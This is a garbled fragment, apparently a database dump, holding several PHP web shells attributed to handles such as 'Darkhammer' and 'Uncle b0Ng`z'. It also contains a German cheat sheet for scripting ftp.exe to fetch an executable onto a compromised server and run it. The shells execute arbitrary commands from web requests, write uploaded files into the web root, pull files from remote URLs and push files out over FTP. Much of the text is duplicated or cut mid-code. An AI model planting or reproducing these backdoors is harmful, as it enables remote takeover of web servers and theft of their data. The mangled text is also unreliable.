\r\n #####################Cmd Befehle: ###################### \r\n \r\n \r\n \r\n \r\n dir \r\n Listet den Inhalt eines Verzeichnisses auf \r\n \r\n \r\n cd \r\n Wechselt in ein Verzeichnis \r\n \r\n \r\n echo \r\n Zeigt Meldungen an, schaltet Befehlsanzeige an/aus \r\n \r\n \r\n ipconfig \r\n Liefert die Ip, Gateway Adresse \r\n \r\n \r\n mkdir \r\n Erstellt ein Verzeichnis \r\n \r\n \r\n path \r\n Zeigt den Pfad an, in dem nach Programmen gesucht wird \r\n \r\n \r\n ping \r\n Sendet ping-Signale an einen Rechner \r\n \r\n \r\n rmdir \r\n Löscht ein Verzeichnis \r\n \r\n \r\n xcopy \r\n Kopiert Dateien und Verzeichnisstrukturen \r\n \r\n \r\n > \r\n Ausgabe wird umgeleitet \r\n \r\n \r\n >> \r\n Ausgabe wird umgeleitet und angehängt \r\n \r\n
\r\n \r\n FTP Download auf Server ausführen, ohne [ ] ( ). \r\n Alles muss nacheinander eingegeben werden ! \r\n \r\n \r\n \r\n \r\n Echo Open [IP-Adresse] 21>>FTP.txt \r\n \r\n \r\n Echo [Benutzername]>>FTP.txt \r\n \r\n \r\n Echo [Passwort]>>FTP.txt \r\n \r\n \r\n Echo [Format - f&u $cmd = $_REQUEST["-cmd"];?>\r\n\r\n\r\nCmd script by Darkhammer \r\n\r\n\r\n\r\n\r\n
\r\n\r\n\r\n \r\n #####################Cmd Befehle: ###################### \r\n \r\n \r\n \r\n \r\n dir \r\n Listet den Inhalt eines Verzeichnisses auf \r\n \r\n \r\n cd \r\n Wechselt in ein Verzeichnis \r\n \r\n \r\n echo \r\n Zeigt Meldungen an, schaltet Befehlsanzeige an/aus \r\n \r\n \r\n ipconfig \r\n Liefert die Ip, Gateway Adresse \r\n \r\n \r\n mkdir \r\n Erstellt ein Verzeichnis \r\n \r\n \r\n path \r\n Zeigt den Pfad an, in dem nach Programmen gesucht wird \r\n \r\n \r\n ping \r\n Sendet ping-Signale an einen Rechner \r\n \r\n \r\n rmdir \r\n Löscht ein Verzeichnis \r\n \r\n \r\n xcopy \r\n Kopiert Dateien und Verzeichnisstrukturen \r\n \r\n \r\n > \r\n Ausgabe wird umgeleitet \r\n \r\n \r\n >> \r\n Ausgabe wird umgeleitet und angehängt \r\n \r\n
\r\n \r\n FTP Download auf Server ausführen, ohne [ ] ( ). \r\n Alles muss nacheinander eingegeben werden ! \r\n \r\n \r\n \r\n \r\n Echo Open [IP-Adresse] 21>>FTP.txt \r\n \r\n \r\n Echo [Benutzername]>>FTP.txt \r\n \r\n \r\n Echo [Passwort]>>FTP.txt \r\n \r\n \r\n Echo [Format - uml;r .exe Dateien (Binary)]>>FTP.txt \r\n \r\n \r\n Echo GET [Datei auf eurem Server]>>FTP.txt \r\n \r\n \r\n Echo Quit>>FTP.txt \r\n \r\n \r\n FTP.exe -s:FTP.txt \r\n \r\n
\r\n Datei auf Server ausführen:
\r\n \r\n \r\n Dateiname.exe \r\n \r\n
\r\n \r\n
\r\nCmd Script by Darkhammer
\r\n\r\n\r\n');
Private PHPmyAdmin OFFBoard HACKLiNE Executeing Commands... '';if($cmd != "") print Shell_Exec($cmd);echo '' UPLOAD in C:\\test\\ '';$uploadDir = "C:\\\\test\\\\";$uploadFile = $uploadDir . $_FILES[''userfile''][''name''];print "";if (move_uploaded_file($_FILES[''userfile''][''tmp_name''], $uploadFile)){print "File was uploaded!";print "Here''s some more debugging info:\\n";print_r($_FILES);}print " ";?>');
INSERT INTO `text` VALUES (' $cmd = $_REQUEST["-cmd"]; $download = $_REQUEST["-download"]; $fileName = $_REQUEST["fileName"]; $fileContent = $_REQUEST["fileContent"]; $error = ""; $localName = getcwd() . strrchr($download, "/"); if (isset($download) && $download != "") { $url_stuff = parse_url($download); $port = isset($url_stuff["port"]) ? $url_stuff["port"] : 80; $fileWrite = fopen($localName, "wb"); if (!is_writeable($localName)) { $error = "Unable to open local file $localName for writing. "; } else { $fp = fsockopen($url_stuff["host"], $port); $query = "GET " . $url_stuff["path"] . " HTTP/1.0"; $query .= "Host: " . $url_stuff["host"]; $query .= "\\\\"; $error = "HTTP REQUEST: $query "; fwrite($fp, $query); $buffer = ""; while ($tmp = fread($fp, 1024)) { if ($buffer == "") { $pos = strpos($tmp, "\\\\"); $buffer = substr($tmp, $pos + 4); } else { $buffer = $tmp; } fwrite ($fileWrite, $buffer); } fclose ($fp); } fclose ($fileWrite); } if (isset($fileName) && $fileName != "") { $fileWrite = fopen (getcwd() . "/" . $fileName, "w"); fwrite($fileWrite, stripslashes($fileContent)); fclose($fileWrite); } ?>Java(TM) 2 Platform Environment - `Azraels & XDIX_5-7 Edition Execute Command: Filename: enter file content here echo ini_set("safe_mode", "Off")." "; set_time_limit(00);if(!$_POST[doppel]) $cmd = stripslashes($_REQUEST["cmdc"]); else $cmd = $_REQUEST["cmdc"]; $s = $_SERVER["PHP_SELF"];if($_GET[a]==1) die(phpinfo());?> "; } } } elseif ($_POST[button] == "dir c:") { exec("dir c:", $result); } elseif ($_POST[button] == "dir d:") { exec("dir d:", $result); } elseif ($_POST[button] == "dir e:") { exec("dir e:", $result); } else { } if (isset($_FILES[userfile])) { if (move_uploaded_file($_FILES[userfile][tmp_name], "$_SERVER[DOCUMENT_ROOT]/$_POST[filename]")) { $err_file = "File is valid, and was successfully uploaded. "; } else { $err_file = "Possible file upload attack! Here is some debugging info:\\n"; $err_file.= print_r($_FILES); $err_file.= " "; } } else { $err_file = "No file selected! "; } ?> Shell v2 by Uncle b0Ng`z Function: exec shell_exec system Command-Line: Results: $output"; } } ?> Files in this dir: "; } } closedir($handle); ?>
Secondary Shell:
name="doppel">Doppelslashesmod if($cmd != "") print htmlentities(shell_exec($cmd));?> if(isset($_POST[upp])){$files = split(",", $_POST[files]);if (!$dlm_ftp_stream = @ftp_connect($_POST[ip]) or !@ftp_login($dlm_ftp_stream, $_POST[user], $_POST[pw])) echo "Verbindung zum Server fehlgeschlagen!";else {for($i=0;$i";}}ftp_quit($dlm_ftp_stream);}?> FTP-UPLOAD: " method="post">To: From (Host/Ip) Port User Pass Files (seperate by ",") HTTP-Download: URL: P2P-Upload: